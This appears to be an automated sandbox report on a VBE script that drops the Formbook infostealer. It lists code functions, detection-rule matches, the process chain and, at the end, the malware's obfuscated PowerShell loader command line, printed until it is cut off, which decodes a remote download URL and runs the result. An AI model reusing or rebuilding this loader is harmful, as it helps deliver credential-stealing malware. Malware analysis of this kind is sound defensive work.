Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F03010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F03D70 NtOpenThread
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F03D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_02ED8B10 NtCreateFile
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_02ED8E10 NtClose
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_02ED8F70 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_02ED8C80 NtReadFile
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_02ED8D70 NtDeleteFile
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04D2F7A4 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04D2F0FF NtQueryInformationProcess
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04D2F05C NtQueryInformationProcess
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04D2F04B NtQueryInformationProcess
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04D2F01B NtQueryInformationProcess
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04D2F036 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04D2F869 NtUnmapViewOfSection
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B8AC022
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B8AB2BF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B97A21A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_046BF320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_046BFBF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_046BEFD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_073ECDE0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2490E4F6
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2491F43F
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_24912446
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_24851460
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_24920591
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_248FD5B0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_24860535
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_24917571
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_249116CC
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2487C6E0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2491F7B0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_2485C7C0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_24884750
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_24860770
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F7E4F6
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F82446
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F90591
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04ED0535
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04EEC6E0
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04ECC7C0
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04ED0770
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04EF4750
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F62000
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F881CC
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F901AA
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F58158
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04EC0100
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F6A118
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F502C0
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F70274
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04EDE3F0
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F903E6
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F8A352
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04EC0CF2
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F70CB5
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04ED0C00
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04ECADE0
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04EE8DBF
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04EDAD00
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F8EEDB
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F8CE93
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04EE2E90
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04ED0E59
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F8EE26
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC2FC813_2_04EC2FC8
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F4EFA013_2_04F4EFA0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F44F4013_2_04F44F40
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F12F2813_2_04F12F28
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF0F3013_2_04EF0F30
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFE8F013_2_04EFE8F0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EB68B813_2_04EB68B8
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED284013_2_04ED2840
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EDA84013_2_04EDA840
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED29A013_2_04ED29A0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F9A9A613_2_04F9A9A6
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EE696213_2_04EE6962
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ECEA8013_2_04ECEA80
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F86BD713_2_04F86BD7
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8AB4013_2_04F8AB40
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC146013_2_04EC1460
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8F43F13_2_04F8F43F
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F6D5B013_2_04F6D5B0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8757113_2_04F87571
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F816CC13_2_04F816CC
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8F7B013_2_04F8F7B0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F870E913_2_04F870E9
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8F0E013_2_04F8F0E0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED70C013_2_04ED70C0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F7F0CC13_2_04F7F0CC
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EDB1B013_2_04EDB1B0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F9B16B13_2_04F9B16B
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EBF17213_2_04EBF172
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F0516C13_2_04F0516C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F712ED13_2_04F712ED
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EED2F013_2_04EED2F0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEB2C013_2_04EEB2C0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED52A013_2_04ED52A0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F1739A13_2_04F1739A
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EBD34C13_2_04EBD34C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8132D13_2_04F8132D
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8FCF213_2_04F8FCF2
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F49C3213_2_04F49C32
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEFDC013_2_04EEFDC0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F87D7313_2_04F87D73
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F81D5A13_2_04F81D5A
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED3D4013_2_04ED3D40
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED9EB013_2_04ED9EB0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04E93FD213_2_04E93FD2
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04E93FD513_2_04E93FD5
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8FFB113_2_04F8FFB1
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED1F9213_2_04ED1F92
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8FF0913_2_04F8FF09
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED38E013_2_04ED38E0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F3D80013_2_04F3D800
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED995013_2_04ED9950
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEB95013_2_04EEB950
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F6591013_2_04F65910
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F7DAC613_2_04F7DAC6
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F15AA013_2_04F15AA0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F6DAAC13_2_04F6DAAC
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F43A6C13_2_04F43A6C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8FA4913_2_04F8FA49
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F87A4613_2_04F87A46
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F45BF013_2_04F45BF0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F0DBF913_2_04F0DBF9
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04E99B8013_2_04E99B80
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEFB8013_2_04EEFB80
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8FB7613_2_04F8FB76
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EC188013_2_02EC1880
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EBC7C913_2_02EBC7C9
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EBC7D013_2_02EBC7D0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EBAA7013_2_02EBAA70
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EBC9F013_2_02EBC9F0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EC4F1013_2_02EC4F10
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EC30FC13_2_02EC30FC
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EC114013_2_02EC1140
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EC310013_2_02EC3100
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EDB40013_2_02EDB400
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2E6CE13_2_04D2E6CE
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2D70413_2_04D2D704
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2D73813_2_04D2D738
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2E21413_2_04D2E214
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2E33313_2_04D2E333
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 2484B970 appears 38 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 248DF290 appears 34 times
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04F17E54 appears 97 times
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04EBB970 appears 257 times
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04F4F290 appears 103 times
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04F05130 appears 57 times
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04F3EA12 appears 86 times
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9379
          Source: unknownProcess created: Commandline size = 9379
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9379Jump to behavior
          Source: amsi32_5812.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.2543568933.0000000024700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000F.00000002.2955372386.0000000002BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000C.00000002.2955148766.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.2955249123.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.2544153499.0000000024B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 1068, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 5812, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBE@17/8@4/3
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Nationalsocialisternes.SkaJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pkhvrw3x.skq.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1068
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5812
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Narudzba ACH0036173.vbeReversingLabs: Detection: 26%
          Source: Narudzba ACH0036173.vbeVirustotal: Detection: 11%
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Narudzba ACH0036173.vbe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. 
StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadi
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. 
StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadi
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
